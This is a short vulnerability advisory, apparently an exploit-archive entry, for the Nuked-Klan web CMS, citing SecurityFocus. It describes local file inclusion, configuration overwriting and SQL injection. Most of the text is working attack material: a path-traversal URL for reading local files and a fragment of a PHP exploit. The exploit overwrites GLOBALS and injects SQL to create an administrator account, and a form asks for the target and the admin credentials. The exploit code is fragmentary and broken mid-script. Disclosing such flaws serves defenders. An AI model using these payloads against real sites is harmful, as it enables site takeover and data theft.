source: https://www.securityfocus.com/bid/10104/info Nuked-Klan is prone to multiple vulnerabilities. These issues include information disclosure via inclusion of local files, an issue that may permit remote attackers to corrupt configuration files and an SQL injection vulnerability. - To include a local file: http://www.example.com/index.php?user_langue=../../../../../file/to/view - Create admin (overwriting GLOBALS) : ------------------------------------------------------- Nuked-KlaN b1.5 Create Admin url='".$target."/index.php? file=Suggest&op=add_sug&user_langue=../globals.php&nuked[prefix]=nuked_users%20 (id,pseudo,pass,niveau)%20VALUES%20(12345,char(".ascii_sql($_POST ["pseudo"])."),md5(char(".ascii_sql($_POST ["pass"]).")),9)/*&module=Gallery';window.open(url);"; echo "



Admin should have been created."; }else{ ?>
Target :
Admin Nick :
Admin Pass :
-------------------------------------------------------